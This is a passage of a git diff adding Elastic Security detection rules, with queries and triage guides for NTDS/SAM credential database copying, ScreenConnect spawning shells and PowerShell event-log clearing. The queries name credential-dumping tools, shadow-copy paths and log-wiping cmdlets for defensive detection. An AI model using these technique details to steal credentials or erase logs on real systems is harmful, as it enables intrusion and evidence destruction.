\"dllhost.exe\",\n \"LogonUI.exe\",\n \"wermgr.exe\",\n \"spoolsv.exe\",\n \"jucheck.exe\",\n \"jusched.exe\",\n \"ctfmon.exe\",\n \"taskhostw.exe\",\n \"GoogleUpdate.exe\",\n \"sppsvc.exe\",\n \"sihost.exe\",\n \"slui.exe\",\n \"SIHClient.exe\",\n \"SearchIndexer.exe\",\n \"SearchProtocolHost.exe\",\n \"FlashPlayerUpdateService.exe\",\n \"WerFault.exe\",\n \"WUDFHost.exe\",\n \"unsecapp.exe\",\n \"wlanext.exe\" ) and\n not (process.parent.name : \"dllhost.exe\" and process.parent.args : \"/Processid:{CA8C87C1-929D-45BA-94DB-EF8E6CB346AD}\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3b47900d-e793-49e8-968f-c90dc3526aa1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_111.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_111.json new file mode 100644 index 00000000000..802538f416d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_111.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "NTDS or SAM Database File Copied", + "note": "## Triage and analysis\n\n### Investigating NTDS or SAM Database File Copied\n\nThe Active Directory Domain Database (ntds.dit) and Security Account Manager (SAM) files are critical components in Windows environments, containing sensitive information such as hashed domain and local credentials.\n\nThis rule identifies copy operations of these files using specific command-line tools, such as Cmd.Exe, PowerShell.EXE, XCOPY.EXE, and esentutl.exe. By monitoring for the presence of these tools and their associated arguments, the rule aims to detect potential credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, command lines, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check for any recent changes in user account privileges or group memberships that may have allowed the unauthorized access.\n- Determine whether the file was potentially exfiltrated from the subject host.\n- Scope compromised credentials and disable the accounts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Look for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n ((?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\") or process.name : (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\")) and\n process.args : (\"copy\", \"xcopy\", \"Copy-Item\", \"move\", \"cp\", \"mv\")\n ) or\n ((?process.pe.original_file_name : \"esentutl.exe\" or process.name : \"esentutl.exe\") and process.args : (\"*/y*\", \"*/vss*\", \"*/d*\"))\n ) and\n process.command_line : (\"*\\\\ntds.dit*\", \"*\\\\config\\\\SAM*\", \"*\\\\*\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy*\\\\*\", \"*/system32/config/SAM*\", \"*\\\\User Data\\\\*\")\n", + "references": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_112.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_112.json new file mode 100644 index 00000000000..3264811e6a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_112.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "NTDS or SAM Database File Copied", + "note": "## Triage and analysis\n\n### Investigating NTDS or SAM Database File Copied\n\nThe Active Directory Domain Database (ntds.dit) and Security Account Manager (SAM) files are critical components in Windows environments, containing sensitive information such as hashed domain and local credentials.\n\nThis rule identifies copy operations of these files using specific command-line tools, such as Cmd.Exe, PowerShell.EXE, XCOPY.EXE, and esentutl.exe. By monitoring for the presence of these tools and their associated arguments, the rule aims to detect potential credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, command lines, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check for any recent changes in user account privileges or group memberships that may have allowed the unauthorized access.\n- Determine whether the file was potentially exfiltrated from the subject host.\n- Scope compromised credentials and disable the accounts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Look for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n ((?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\") or process.name : (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\")) and\n process.args : (\"copy\", \"xcopy\", \"Copy-Item\", \"move\", \"cp\", \"mv\")\n ) or\n ((?process.pe.original_file_name : \"esentutl.exe\" or process.name : \"esentutl.exe\") and process.args : (\"*/y*\", \"*/vss*\", \"*/d*\"))\n ) and\n process.command_line : (\"*\\\\ntds.dit*\", \"*\\\\config\\\\SAM*\", \"*\\\\*\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy*\\\\*\", \"*/system32/config/SAM*\", \"*\\\\User Data\\\\*\")\n", + "references": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d00feab-e203-4acc-a463-c3e15b7e9a73_1.json b/packages/security_detection_engine/kibana/security_rule/3d00feab-e203-4acc-a463-c3e15b7e9a73_1.json new file mode 100644 index 00000000000..4b44db896ac --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3d00feab-e203-4acc-a463-c3e15b7e9a73_1.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the ScreenConnect server process (ScreenConnect.Service.exe). This activity may indicate exploitation activity or access to an existing web shell backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "logs-system.security*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ScreenConnect Server Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"ScreenConnect.Service.exe\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"csc.exe\") or\n ?process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", + "references": [ + "https://blackpointcyber.com/resources/blog/breaking-through-the-screen/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3d00feab-e203-4acc-a463-c3e15b7e9a73", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "3d00feab-e203-4acc-a463-c3e15b7e9a73_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_105.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_105.json new file mode 100644 index 00000000000..33953cf7b2e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_105.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Management\\\\*.psd1" + } + } + } + } + ], + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Log Clear Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Clear-EventLog\" or\n \"Remove-EventLog\" or\n (\"Eventing.Reader.EventLogSession\" and \".ClearLog\") or\n (\"Diagnostics.EventLog\" and \".Clear\")\n ) and\n not powershell.file.script_block_text : (\n \"CmdletsToExport=@(\\\"Add-Content\\\"\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear", + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "3d3aa8f9-12af-441f-9344-9f31053e316d_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_4.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_4.json new file mode 100644 index 00000000000..c46ec22c907 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_4.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Log Clear Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Clear-EventLog\" or\n \"Remove-EventLog\" or\n (\"Eventing.Reader.EventLogSession\" and \".ClearLog\") or\n (\"Diagnostics.EventLog\" and \".Clear\")\n ) and\n not file.path : (\n ?\\:\\\\\\\\*\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\Microsoft.PowerShell.Management\\\\\\\\*.psd1\n ) and\n not powershell.file.script_block_text : (\n \"CmdletsToExport=@(\\\"Add-Content\\\"\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear", + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "3d3aa8f9-12af-441f-9344-9f31053e316d_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_5.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_5.json new file mode 100644 index 00000000000..68b7abcd2dd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_5.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Log Clear Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Clear-EventLog\" or\n \"Remove-EventLog\" 